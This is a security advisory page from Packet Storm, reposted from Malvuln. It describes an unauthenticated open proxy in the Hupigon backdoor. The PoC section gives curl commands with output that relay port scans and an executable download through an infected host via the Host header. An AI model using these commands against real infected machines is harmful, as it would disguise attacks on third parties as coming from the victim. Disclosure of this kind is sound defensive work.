what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Backdoor.Win32.Hupigon.das MVID-2021-0166 Unauthenticated Open Proxy

Backdoor.Win32.Hupigon.das MVID-2021-0166 Unauthenticated Open Proxy
Posted Apr 8, 2021
Authored by malvuln | Site malvuln.com

Backdoor.Win32.Hupigon.das malware has an unauthenticated open proxy functionality.

tags | exploit
systems | windows
SHA-256 | 1152cc89af19d578c0a54240ee87d212b4538fd4567703bcbf10048dc1670c7d

Backdoor.Win32.Hupigon.das MVID-2021-0166 Unauthenticated Open Proxy

Change Mirror Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/7afe56286039faf56d4184c476683340.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Hupigon.das
Vulnerability: Unauthenticated Open Proxy
Description: The malware drops an hidden executable named "winserv.com" under Windows dir, which accepts TCP connections on port 8080. Afterwards, it connects to a destination, and relays requests from the original connection to the destination and then back to the origination system. Attackers who can reach an infected system may launch attacks, download files or port scan third party systems and it will appear as the attacks originated from that infected host. The relay does not require authentication or any special User-agent check and leverages the HTTP Host header in the request to connect to third-party systems.
Type: PE32
MD5: 7afe56286039faf56d4184c476683340
Vuln ID: MVID-2021-0166
Dropped files: winserv.com
Disclosure: 04/07/2021

Exploit/PoC:
Scan FTP port 21)

curl -v http://192.168.88.128:8080 -H "Host: 192.168.88.129:21"
* Rebuilt URL to: http://192.168.88.128:8080/
* Trying 192.168.88.128...
* TCP_NODELAY set
* Connected to 192.168.88.128 (192.168.88.128) port 8080 (#0)
> GET / HTTP/1.1
> Host: 192.168.88.129:21
> User-Agent: curl/7.55.1
> Accept: */*
>
220 INetSim FTP Service ready.


Scan POP3 port 110)

curl -vv http://192.168.88.128:8080 -H "Host: 192.168.88.129:110"
* Rebuilt URL to: http://192.168.88.128:8080/
* Trying 192.168.88.128...
* TCP_NODELAY set
* Connected to 192.168.88.128 (192.168.88.128) port 8080 (#0)
> GET / HTTP/1.1
> Host: 192.168.88.129:110
> User-Agent: curl/7.55.1
> Accept: */*
>
+OK INetSim POP3 Server ready <57612.1617679472@pop3host>


Download files, DOOM.exe lives on 88.129)

curl -v http://192.168.88.128:8080/DOOM.exe -H "Host: 192.168.88.129:2222" --out 2.exe
* Trying 192.168.88.128...
* TCP_NODELAY set
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Connected to 192.168.88.128 (192.168.88.128) port 8080 (#0)
> GET /DOOM.exe HTTP/1.1
> Host: 192.168.88.129:2222
> User-Agent: curl/7.55.1
> Accept: */*
>
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Server: SimpleHTTP/0.6 Python/2.7.6
< Date: Tue, 06 Apr 2021 03:35:52 GMT
< Content-type: application/x-msdos-program
< Content-Length: 103533
< Last-Modified: Sat, 03 Aug 2019 04:57:12 GMT
<
{ [83868 bytes data]
100 101k 100 101k 0 0 101k 0 0:00:01 --:--:-- 0:00:01 498k
* Closing connection 0


The executable dropped by this malware lives here, use attrib -s -h to unhide it.
C:\Windows>dir winserv.com
Volume in drive C has no label.

Directory of C:\Windows

File Not Found

C:\Windows>attrib -s -h winserv.com

C:\Windows>dir winserv.com
Volume in drive C has no label.

Directory of C:\Windows

06/16/2012 02:53 AM 780,288 winserv.com
1 File(s) 780,288 bytes


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close